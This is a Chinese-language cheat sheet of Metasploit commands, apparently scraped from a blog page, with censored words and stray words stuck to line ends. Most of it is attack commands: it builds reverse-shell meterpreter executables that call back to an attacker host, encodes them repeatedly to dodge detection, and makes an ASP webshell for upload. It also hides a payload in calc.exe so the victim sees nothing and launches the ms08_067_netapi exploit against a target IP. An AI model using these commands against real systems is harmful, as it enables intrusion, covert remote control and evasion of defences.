MSF經常使用的監聽模塊命令

msfpayload 命令
javascript


  幫助html

msfpayload -h

  列出全部可用的***載荷  
java

msfpayload windows/meterpreter/bind_tcp O

  列出全部windows/meterpreter/bind_tcp 下***載荷的配置項(任何***載荷都是能夠配置的)web

msfpayload windows/meterpreter/bind_tcp O.

  建立一個meterperter的reverse_tcp***載荷,回連到your ip的端口,將其保存爲名爲payload.exe的windows可執行程序shell

msfpayload windows/meterpreter/reverse_tcp LHOST=your ip LPORT=port X > payload.exe

  與上生成一樣的***載荷,導出成原始格式文件,該文件將後面的MSFencode中使用windows

msfpayload windows/meterpreter/reverse_tcp LHOST=your ip LPORT=port R > payload.raw

  與上面生成一樣的***載荷,但導出成C格式的shellcodeapi

msfpayload windows/meterpreter/bind_tcp LPORT=port C > payload.c

  導出成以%U編碼方式的javascript語言字符串瀏覽器

msfpayload windows/meterpreter/bind_tcp LPORT=port J > payload.java

  產生webshell將此webshell上傳到服務器,這個步驟要有上傳權限ruby

msfpayload windows/meterpreter/reverse_tcp LHOST=your_ip | msfencode -t asp -o webshell.asp

  啓動msfconsole 輸入:服務器

use exploits/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST your_ip
exploit


msfencode 命令


   幫助

msfencode -h

  列出全部可用的編碼器

msfencode -l

  顯示編碼緩衝區的格式

msfencode -t (c,elf,java,js_Le,js_be,perl,raw,ruby,vba,vbs,loop-vbs,asp,war,macho)

  使用shikata_ga_nai編碼器對payload.raw文件進行5次編碼,而後導出一個名爲encoded_payload.exe的文件

msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe

  建立一個通過多種編碼格式的嵌套編碼的***載荷

msfpayload windows/meterpreter/bind_tcp LPORT=port R | msfencode -e x86/_countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe

  建立一個純字母數字的shellcode,由ESI寄存器指向shellcode,以C語言格式輸出

msfencode -i payload.raw BufferRegister=ESI -e x86/alpha_mixed -t c


msfcli命令


僅列出******模塊

msfcli|grep exploit

僅列出與windows相關的******模塊

msfcli|grep exploit/windows

對對方IP發起ms08_067_natapi******,配置bind_tcp***載荷,並綁定在443端口進行監聽

msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_ctp LPORT=443 RHOST=對方IP E


metasploit高級忍術


 建立一個反彈式的meterpreter***載荷,回連到192.168.1.1主機的443端口,使用calc.exe做爲載苛後門程序,讓載荷執行流一直運行在被***的應用程序中,最後生成以.shikata_ga_nai編碼器編碼後的***載荷可執行程序payload.exe

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=443 R | msfencode -x calc.exe -k -o payload.exe -e x86/skikata_ga_nai -c 7 -t exe

建立一個反彈式的meterpreter***載荷,回連到192.168.1.1主機的443端口,使用calc.exe做爲載苛後門程序,不讓載荷執行流一直運行在被***的應用程序中,同時在***載荷執行後也不會在目標主機上彈出任何信息,這種配置很是有用,當你經過瀏覽器漏洞控制了遠程主機,並不想讓計算器程序打開呈如今目標用戶面前。一樣,最後生成用.shikata_ga_nai編碼器的***載荷可執行程序payload.exe

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=443 R | msfencode -x calc.exe -o payload.exe -e x86/skikata_ga_nai -c 7 -t exe

建立一個raw格式的bind_tcp模式meterpreter***載荷,用.shikata_ga_nai編碼7次,輸出以payload.exe命名的windows可執行程序文件,同時啓用多路監聽方式進行執行

msfpayload windows/meterpreter/bind_tcp LHOST=192.168.1.1 LPORT=443 R | msfencode -o payload.exe -e x86/shikata_ga_nai -c 7 -t exe && msfcli multi/handler PAYLOAD=windows/meterpreter/bind_tcp LPORT=443 E
相關文章
相關標籤/搜索